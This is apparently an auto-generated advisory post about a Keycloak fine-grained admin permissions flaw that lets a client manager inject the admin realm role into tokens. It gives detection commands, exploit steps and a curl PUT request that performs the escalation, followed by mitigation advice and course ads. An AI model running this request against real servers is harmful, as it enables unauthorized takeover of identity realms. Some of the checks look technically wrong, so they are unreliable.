Listen to this Post
The vulnerability resides in Keycloak’s Fine-Grained Admin Permissions (FGAPv2). An administrator with only client management permissions can exploit a flaw in the scope mapping functionality. By crafting a specific request, they can assign any realm role, including highly privileged ones like `admin` or manage-realm, to a client’s scope mapping. This bypasses intended security controls. When a user authenticates to the modified client, the injected role is projected into their authentication token. This leads to unauthorized privilege escalation within the Keycloak realm. The attack vector is network-based, requires low complexity, and can have high impact on confidentiality and integrity. The CVSS base score is 7.3.
DailyCVE Form:
Platform: Keycloak FGAPv2
Version: All vulnerable
Vulnerability: Privilege escalation
Severity: High (CVSS:7.3)
date: 2026-05-28
Prediction: 2026-06-10
What Undercode Say:
Analyzing the vulnerability, Undercode suggests the following checks:
Check for vulnerable Keycloak version
keycloak_version=$(curl -s http://localhost:8080/auth/realms/master/protocol/openid-connect/certs | jq -r '.issuer' | cut -d'/' -f3)
echo "Keycloak Version: $keycloak_version"
Identify clients with FGAPv2 enabled
curl -s -H "Authorization: Bearer $ADMIN_TOKEN" http://localhost:8080/admin/realms/master/clients | jq '.[] | select(.fineGrainedAccessPolicy != null) | .clientId'
Check for suspicious scope mappings
curl -s -H "Authorization: Bearer $ADMIN_TOKEN" "http://localhost:8080/admin/realms/master/clients/$CLIENT_ID/scope-mappings/realm" | jq '. | select(.[] | .name | contains("admin") or contains("manage-realm"))'
Exploit:
An attacker with limited permissions can:
- Obtain an access token for a user with `manage-clients` role.
2. Identify a target client.
- Send a PUT request to add a high-privilege realm role to the client’s scope mapping.
- Wait for a privileged user to authenticate to the modified client.
5. Capture their token containing the injected role.
Example exploit using curl:
Add the 'admin' realm role to client 'evil-client' scope-mapping
curl -X PUT "http://localhost:8080/admin/realms/master/clients/EVIL_CLIENT_ID/scope-mappings/realm" \
-H "Authorization: Bearer $LIMITED_ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '[{"id":"admin-role-id","name":"admin"}]'
Protection:
Upgrade: Apply the patch from Red Hat when available.
Restrict Permissions: Do not assign `manage-clients` to untrusted users.
Audit: Regularly review client scope mappings for unauthorized roles.
Network Controls: Limit access to Keycloak admin API.
Impact:
Privilege Escalation: Any user authenticating to a modified client gains high privileges.
Data Breach: Unauthorized access to sensitive data.
System Compromise: Full realm compromise is possible.
Compliance: Violations of least privilege and access control policies.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
